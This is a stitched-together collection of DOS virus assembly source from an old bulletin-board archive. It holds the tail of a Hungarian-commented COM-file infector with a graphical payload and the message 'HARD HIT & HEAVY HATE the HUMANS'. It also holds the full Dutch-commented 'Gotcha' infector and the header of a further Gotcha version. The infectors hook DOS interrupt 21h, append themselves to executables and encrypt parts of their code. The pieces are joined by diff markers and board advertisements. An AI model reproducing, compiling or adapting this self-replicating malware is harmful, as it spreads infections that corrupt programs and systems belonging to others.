mov ah,2ah
int 21h
cmp al,1
jne zipp
dec al
out 0a0h,al
mov al,dma
out 41h,al
zipp:
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push cs
mov cx,100h
push cx
mov cx,ds:[0feh]
sub cx,100h
retf
eltarol dw 20cdh
eltarol2 db 90h
;######################### Vyrus activated ##########################
csik: mov ax,0e000h
mov ds,ax
csiky: mov ds:[0],al
inc al
jmp csiky
;######################### propagation part ##########################
eredeti: db 0eah ; original
int211 dw 0
int212 dw 0
counter dw 0
szaporodas: cmp ah,4bh
jne eredeti
or al,al
jnz eredeti
push ax
push es
push bx
push ds
push dx
mov bx,dx
koj: inc bx
cmp byte ptr [bx],'.'
jne koj
cmp byte ptr[bx+1],'C'
jne kiugras1
mov cs:kds,ds
mov cs:kdx,dx
mov cs:kbx,bx
call probe
kiugras1: pop dx
pop ds
pop bx
pop es
pop ax
jmp eredeti
kds dw 0
kdx dw 0
kbx dw 0
kkk dw 0
fszam dw 0
probe: push cs
pop es
mov di,offset memory
mov si,dx
mov cx,40
cld
rep movsw
mov bx,0ff0h
mov ah,48h
int 21h
jnc juk1
ret
;!!!!! memoria lefoglalva (kkk = Seg)
atr dw 0
juk1: mov cs:kkk,ax
mov dx,offset memory
push ds
pop es
mov bx,cs:kbx
mov byte ptr [bx+1],'A'
call elorutin
push cs
pop ds ;DS:DX a masolt nev.
mov ax,4300h
int 21h
mov atr,cx
xor cx,cx
mov ax,4301h
int 21h
;!!!!! Attr allitas
cmp cs:attrflag,0
jz juk2
mov ds,cs:kds
jmp memoff
juk2: mov di,kdx ;ES:DI a regi nev atirva
mov ah,56h
int 21h
call utorutin ;!!!!! Atnevezve
mov dx,cs:kdx
push es
pop ds
mov ax,3d02h
int 21h ;!!!!! File megnyitva
mov cs:fszam,ax
mov ds,cs:kkk
xor dx,dx
mov bx,ax
mov cx,0fc00h-(offset memory-offset resid)
mov ah,3fh
int 21h
cmp ax,0fc00h-(offset memory-offset resid)
;!!!!! Beolvasva a program (csak a hossza miatt)
je hosszu ;zarjuk le a file-t
cmp ax,7580
jb hosszu ;tul rovid a file
mov di,ax
mov bx,ds:[1]
cmp word ptr [bx+3],0b950h
;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$
je hosszu
push di
mov cx,(offset memory-offset resid)
mov si,offset resid
push ds
pop es
push cs
pop ds
inc byte ptr ds:[offset jhg1 +2]
mov ax,es:[0]
mov eltarol,ax
mov al,es:[2]
mov eltarol2,al
rep movsw ;!!!!! Atmasolva (hehe)
mov al,byte ptr ds:[offset jhg1 +2]
pop di
add di,(offset begin-offset resid)
mov cx,offset memory - offset begin ;#### coding ####
jhga: xor byte ptr es:[di],al
inc di
loop jhga
sub di,(offset memory - offset resid)
push di ;Az ugrasi hely
mov bx,fszam
mov cx,offset memory - offset begin
mov dx,di
push es
pop ds
mov ah,40h
int 21h
pop di
cmp ax,offset memory - offset begin
je ghj1
hosszu: jmp zardle
ghj1: ;!!!!! Kiirva a vege
mov byte ptr ds:[0],0e9h
sub di,3
mov ds:[1],di
mov bx,cs:fszam
xor cx,cx
xor dx,dx
mov ax,4200h
push bx
int 21h
pop bx
mov cx,3
xor dx,dx
mov ah,40h
int 21h
zardle: mov bx,cs:fszam
mov ah,3eh
int 21h ;!!!!! File lezarva
push cs
pop es
mov di,offset memory
mov ds,cs:kds
mov dx,cs:kdx
mov ah,56h
int 21h ;!!!!! File visszanevezve
mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
mov ax,4301h
mov cx,cs:atr
int 21h ;!!!!! attr visszaall
memoff: mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
push cs
pop ds
mov es,cs:kkk
mov ah,49h
int 21h ;!!!!! Memoria visszaalt
ret
it241 dw 0
it242 dw 0
attrflag db 0
elorutin: mov cs:attrflag,0
xor ax,ax
mov ds,ax
mov ax,ds:[90h]
mov cs:it241,ax
mov ax,ds:[92h]
mov cs:it242,ax
mov ds:[90h],offset it24
mov ds:[92h],cs
ret
utorutin: xor ax,ax
mov ds,ax
mov ax,cs:it241
mov ds:[90h],ax
mov ax,cs:it242
mov ds:[92h],ax
ret
it24: mov cs:attrflag,1
xor al,al
iret
vanesik db 0
irq: cli
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
cmp cs:counter,0
je sabad
dec cs:counter
jne sabad
xor ax,ax
mov ds,ax
mov ax,ds:[84h]
mov cs:int211,ax
mov ax,ds:[86h]
mov cs:int212,ax
mov ds:[84h],offset szaporodas
mov ds:[86h],cs
sabad: cmp cs:vanesik,0
je keress
call idovan
jmp jumper
keress: call ruut
jumper: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
iret
idovan: xor ah,ah
int 1ah
and dx,suruseg
jne rutyi
call action
rutyi: ret
ruut: mov ax,0b800h
mov es,ax
mov di,cs:did
mov cx,512
cld
poke: jcxz huy
mov al,'E'
repnz scasb
jz talalt
huy: cmp di,4095
jb kisebb
mov cs:did,0
ret
kisebb: add cs:did,512
ret
did dw 0
talalt: test di,1
jz poke
mov dl,es:[di+1]
mov dh,es:[di+3]
or dx,2020h
cmp dx,6973h ;'is'
jne poke
mov bl,es:[di+5]
or bl,20h
cmp bl,'k'
jne poke
mov cs:vanesik,1
jmp huy
action: mov ax,cs
mov ds,ax
mov es,ax
mov vanesik,0
mov pontszam,1
mov si,offset zizi
mov di,offset novi
cld
mov cx,6
rep movsw
call zoldseg
jammed: mov ax,3
int 10h
cmp counterr,atvar
jne fdr
push cs
pop es
lea bx,mess
mov ax,1301h
mov bx,1
xor dx,dx
mov cx,offset drt-offset mess
int 10h
fdr: ret
counterr dw 0
zoldseg: cli
mov di,offset memory
xor ax,ax
cld
mov cx,200*3
rep stosw
mov ah,0c0h
mov si,3333h
int 15h
cmp si,3333h
mov ax,xtvar
je xt
mov ax,atvar
xt: mov counterr,ax
mov ax,3502h
int 21h
cmp bx,0e9eh
jne ibm
call init1
mov pontm,100
mov port,22h
jmp entry
ibm: ;Ibm bulik
mov pontm,200
mov al,70h
mov port,60h ;%
mov ah,15
int 10h
cmp al,7
jne cga
call init3
jmp entry
cga: call init2
jmp entry
port dw 22h
pontm dw 100
init1: mov ax,200h
mov es,ax
xor di,di
mov cx,4000h
cld
xor ax,ax
rep stosw
mov plotdw,offset plot
mov unplotdw,offset unplot
ret
init2: mov ax,0b800h
mov es,ax
mov ax,6
int 10h
mov plotdw,offset plotcga
mov unplotdw,offset unplotcga
ret
init3: mov ax,0b000h
mov es,ax
call prog
mov plotdw,offset plotherc
mov unplotdw,offset unplotcga
ret
prog: mov dx,3bfh
mov al,3
out dx,al
mov al,28h
mov dx,3b8h
out dx,al
mov ah,0
mov cx,12
lea bx,ports
lopi1: mov dx,03b4h
mov al,ah
out dx,al
inc ah
mov dx,03b5h
mov al,[bx]
out dx,al
inc bx
loop lopi1
mov dx,3bfh
mov al,3
out dx,al
mov dx,3b8h
mov al,0ah
out dx,al
xor di,di
mov cx,4000h
xor ax,ax
cld
rep stosw
ret
ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0
;**************************** Forgatorutin ************************************
even
sina dw 0
cosa dw 0 ;si-t meghagyja
sinb dw 0
cosb dw 0
pontszam dw 1
transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB
; add bx,ytol ;ez itt jolesz
shl di,1
shl bx,1 ;X es Y elokeszitese a szorzashoz
mov ax,di
imul cosa
mov bp,dx
mov ax,bx
imul sina
add bp,dx ; bp=X' = cosa*X + sina*Y
mov ax,bx
imul cosa
mov bx,dx
mov ax,di
imul sina
sub bx,dx ; bx=Y' = cosa*X - sina*Y
shl bp,1
shl cx,1 ;X' es Z elokeszitese
mov ax,bp
imul cosb
mov di,dx
mov ax,cx
imul sinb
sub di,dx ; di=X'' = cosb*X' - sinb*Z
mov cx,di
mov ax,bx
ret
comment @
mov ax,cx
imul cosb
mov cx,dx
mov ax,bp
imul sinb
add cx,dx ; cx=Z'' = cosb*Z = sinb*X'
; out: di=X'' bx=Y'' cx=Z''
mov dx,keptav
;****************************** PERSPEKTIVA **********************************
mov ax,di
shl ax,1
imul tavol
mov cx,dx
mov ax,bx
shl ax,1
imul tavol
mov ax,dx
ret ; ki : CX=X' AX=Y'
@
plotherc: ; al=y cx=x
xor ah,ah
mov dx,ax
shr dx,1
add ax,dx
mov dx,cx
mov cl,al
and cl,3
shr ax,1
shr al,1
mov di,2000h
shl di,cl
mov cl,90
mul cl
add di,ax
mov ax,dx
mov cx,dx
jmp ezisi
plotcga: xor di,di
shr ax,1
jnc tryp
mov di,2000h
tryp: mov dl,80
mul dl
add di,ax
mov ax,cx
ezisi: shr ax,1
shr ax,1
shr ax,1
add di,ax
and cl,7
mov al,128
shr al,cl
or es:[di],al
jmp ezis1
unplotcga: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di],al
ret
plot: ;AL = y koord. cx = x koord.
mov dl,160
mul dl
mov di,ax
mov ax,cx
shr ax,1
shr ax,1
add di,ax
and di,-2
and cl,7
mov al,128
shr al,cl
or es:[di+egy],al
ezis1: mov [bx],al
inc bx
mov [bx],di
add bx,2
ret
unplot: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di+egy],al
ret
kezdfazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
ck1: push cx
lodsw
mov cx,ax
shl cx,1
add cx,320
lodsw
add si,2
add ax,50
call word ptr [plotdw]
pop cx
loop ck1
ret
indy db 0
fazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
mov indy,1
ck12: push cx
call word ptr [unplotdw]
push bx
lodsw
mov di,ax
lodsw
mov bx,ax
lodsw
mov cx,ax
call transzform
pop bx
add ax,50
mov di,bxpo
add al,[di]
shl cx,1
add cx,bxpo2
cmp indy,0
je ruty
mov indy,0
cmp karal2,0
jne ruty
push cx
push ax
inc cx
call word ptr [plotdw]
pop ax
pop cx
sub bx,3
ruty: call word ptr [plotdw]
pop cx
loop ck12
ret
novpont: mov ax,pontm
cmp pontszam,ax
je trew
mov cx,pontm
sub cx,pontszam
mov ch,cl
shR cx,1
shr cx,1
yut: loop yut
inc pontszam
ret
trew: call movie
mov bx,bxpo
cmp bx,offset patt
je valto
cmp bx,offset patt+29
je valto
iuy: add bx,novi
mov bxpo,bx
ret
valto: neg novi
jmp iuy
novi dw -1
bxpo dw offset patt
bxpo2 dw 320
novi2 dw 4
karal dw 300
karal2 dw 600
zizi dw -1,offset patt,320,4,300,600
movie: cmp karal,0
je jesty
dec karal
ret
jesty: cmp karal2,0
je jesty2
dec karal2
jesty2: mov bx,bxpo2
cmp bx,100
je valto2
cmp bx,540
je valto2
iuy2: add bx,novi2
mov bxpo2,bx
ret
valto2: neg novi2
jmp iuy2
elokesz: call novpont
mov bl,szogx
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sina,ax
mov ax,costabl[bx]
mov cosa,ax
mov bl,szogy
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sinb,ax
mov ax,costabl[bx]
mov cosb,ax
mov al,szogxvalt
add szogx,al
mov al,szogyvalt
add szogy,al
ret
even
szogx db 0
szogy db 0
szogxvalt db 2
szogyvalt db 5
tavol dw 32767
phase: call elokesz
call fazisrajz
ret
entry: call kezdfazisrajz
rajta1: call phase
cmp pontm,100
je apc
cmp byte ptr ds:[offset ruut +2],0b8h
je ccggaa
mov cx,counterr
mov dx,3bah
qaz1: in al,dx
and al,1
jnz qaz1
qaz2: in al,dx
and al,1
jz qaz2
loop qaz1
jmp apc
ccggaa: mov dx,3dah
qaz3: in al,dx
and al,8
jnz qaz3
qaz4: in al,dx
and al,8
jz qaz4
apc: mov dx,port
in al,dx
and al,1
jz rajta1
ret
even
plotdw dw 0
unplotdw dw 0
sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393
dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279
dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519
dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811
dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898
dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580
dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728
dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273
dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790
dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005
dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151
dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512
dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410
dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808
dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204
dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731
dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105
dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113
dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609
dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521
dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852
dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170
dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530
dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039
dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011
dw -3212, -2410, -1608, -804
costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571
dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683
dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731
dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868
dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279
dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179
dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804
dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602
dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530
dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594
dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790
dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956
dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971
dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757
dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285
dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571
dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731
dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868
dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279
dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179
dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804
dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602
dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793
dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530
dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594
dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790
dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956
dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971
dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757
gombdata:
DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46
DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25
DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21
DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25
DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0
DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2
DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5
DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12
DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30
DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0
DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44
DW 33,15,-33,46,12,-14,48,9,7,40,6,29
DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29
DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44
DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0
DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30
DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12
DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5
DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2
DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0
DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25
DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21
DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25
DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46
DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0
DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46
DW 33,15,-33,44,18,-14,44,21,7,35,24,25
DW 19,26,37,0,29,40,-17,31,34,-29,34,21
DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25
DW 3,43,-23,12,45,-17,16,46,-8,15,47,0
DW 11,48,5,5,49,7,0,49,6,0,49,2
DW 0,49,0,2,49,0,6,49,0,7,49,5
DW 5,48,11,0,47,15,-8,46,16,-17,45,12
DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30
DW 5,36,-33,21,34,-29,34,31,-17,40,29,0
DW 37,26,19,25,24,35,7,21,44,-14,18,44
DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29
DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29
DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44
DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0
DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30
DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12
DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5
DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2
DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0
DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25
DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21
DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25
DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46
DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0
patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27
db 31,35,40,45,50,56,61,67,73,80,86,93
mess db 'HARD HIT & HEAVY HATE the HUMANS !!'
db ' [ H.H.& H.H. the H. ] '
drt dw 5 dup (0)
memory:
CODE ENDS
END START
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@@ -0,0 +1,397 @@
;****************************************************************************
;* stripped COM-versie
;* met signature's
;*
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ eind - begin
RESPAR equ (FILELEN/16) + 17
BUFLEN equ 08h
VERSION equ 4
.RADIX 16
;****************************************************************************
;* Opstart programma
;****************************************************************************
begin: xor bx,bx
mov cl,07h
crloop: call crypt
loop crloop
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?
handle dw ?
sign db 0
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,4B00h
jne ni_verder
push es
push ds
push ax
push bx
push cx
push dx
call attach
mov cl,[sign]
call crypt
inc cl
and cl,07h
mov [sign],cl
call crypt
pop dx
pop cx
pop bx
pop ax
pop ds
pop es
exit: popf
jmp dword ptr cs:[oi21] ;naar oude int-handler
ni_verder: cmp ax,0DADAh
jne exit
mov ax,0A500h+VERSION
popf
iret
;****************************************************************************
;* plakt programma aan file (ASCIIZ DS:DX)
;****************************************************************************
attach: cld
mov ax,3D02h ;open de file
int 21
jc finnish
push cs
pop ds
mov [handle],ax ;bewaar file-handle
call eindptr ;bepaal lengte
jc finnish
mov [oldlen],ax
sub ax,SIGNLEN ;pointer naar eind - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
jc finnish
mov cx,SIGNLEN ;lees de laatse bytes
mov dx,offset buffer
call flread
jc finnish
verder3: push cs ;vergelijk signature met buffer
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
or cx,cx
jz finnish
call beginptr ;lees begin van file
mov cx,BUFLEN
mov dx,offset buffer
call flread
jc finnish
cmp word ptr [buffer],5A4Dh
jz finnish
call writeprog ;schrijf programma naar file
jc finnish
mov ax,[oldlen] ;bereken call-adres
add ax,offset entry
sub ax,0103
mov byte ptr [buffer],0E9h
mov word ptr [buffer+1],ax
call beginptr ;pas begin van file aan
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
jc finnish
finnish: mov bx,[handle] ;sluit de file
mov ah,3Eh
int 21
ret
;****************************************************************************
;* Crypt een signature
;****************************************************************************
crypt: push cx
mov al,14h
mul cl
add ax,offset virsig
mov si,ax
mov di,ax
push cs
push cs
pop ds
pop es
mov cx,0Ah
cryploop: lodsw
xor ax,0FFFFh
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Schrijf programma naar file
;****************************************************************************
writeprog: call eindptr
mov cx,FILELEN
mov dx,offset begin
call flwrite
ret
;****************************************************************************
;* Subroutines voor file-pointer
;****************************************************************************
beginptr: mov al,00h ;naar begin van de file
xor cx,cx
xor dx,dx
jmp ptrmov
eindptr: mov al,02h ;naar eind van de file
xor cx,cx
xor dx,dx
; jmp ptrmov
ptrmov: mov ah,42h
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Subroutines voor lezen/schrijven
;****************************************************************************
flwrite: push cs
pop ds
mov ah,40h
mov bx,[handle]
int 21
ret
flread: push cs
pop ds
mov ah,3Fh
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Activering vanuit file
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin programma - 100
cld
mov ax,bx ;copieer oude begin terug
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
mov ax,0100h
push ax
entcall: mov ax,0DADAh ;kijk of al geinstalleerd
int 21h
cmp ah,0A5h
je entstop
call install ;installeer het programma
entstop: ret
;****************************************************************************
;* Installatie in het geheugen
;****************************************************************************
install: push ds
push es
xor ax,ax ;haal oude vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov [bx+offset oi21],cx
mov [bx+offset oi21+2],dx
mov ax,ds ;pas geheugen-grootte aan
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
mov es,es:[0012h] ;copieer programma naar top
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;zet nieuwe vector
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Tekst en Signature
;****************************************************************************
virsig:
;SYSLOCK Virus
db 0D1h, 0E9h, 8Ah, 0E1h
db 8Ah, 0C1h, 33h, 06h
db 14h, 00h, 31h, 04h
db 46h, 46h, 0E2h, 0F2h
db 5Eh, 59h, 58h, 0C3h
;Sylvia Virus
db 8Dh, 36h, 03h, 01h
db 33h, 0C9h, 33h, 0C0h
db 0ACh, 3Ch, 1Ah, 74h
db 04h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;DATACRIME IIb Virus
db 2Eh, 8Ah, 07h, 32h
db 0C2h, 0D0h, 0CAh, 2Eh
db 88h, 07h, 43h, 0E2h
db 0F3h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Yankee-Go-Home Virus (Enigma)
db 0D8h, 0Eh, 1Fh, 0BEh
db 37h, 08h, 81h, 0EEh
db 03h, 01h, 03h, 0F3h
db 89h, 04h, 0BEh, 39h
db 08h, 81h, 0EEh, 03h
;Slowdown Virus
db 0DEh, 90h, 90h, 81h
db 0C6h, 1Bh, 00h, 0B9h
db 90h, 06h, 2Eh, 80h
db 34h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Scotts Valley Virus
db 5Eh, 8Bh, 0DEh, 90h
db 90h, 81h, 0C6h, 32h
db 00h, 0B9h, 12h, 08h
db 2Eh, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Tiny-2A related Virus
db 0A5h, 8Eh, 0C1h, 0A6h
db 74h, 12h, 4Eh, 4Fh
db 0F3h, 0A5h, 8Eh, 0C1h
db 93h, 91h, 91h, 26h
db 87h, 85h, 0E0h, 0FEh
;DATACRIME 1280 Virus
db 8Bh, 36h, 01h, 01h
db 83h, 0EEh, 03h, 8Bh
db 0C6h, 3Dh, 00h, 00h
db 75h, 03h, 0E9h, 02h
db 01h, 90h, 90h, 90h
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h
signature: db 'GOTCHA!',0
signend:
eind:
cseg ends
end begin

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@@ -0,0 +1,503 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;****************************************************************************
;* Gotcha version 17
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
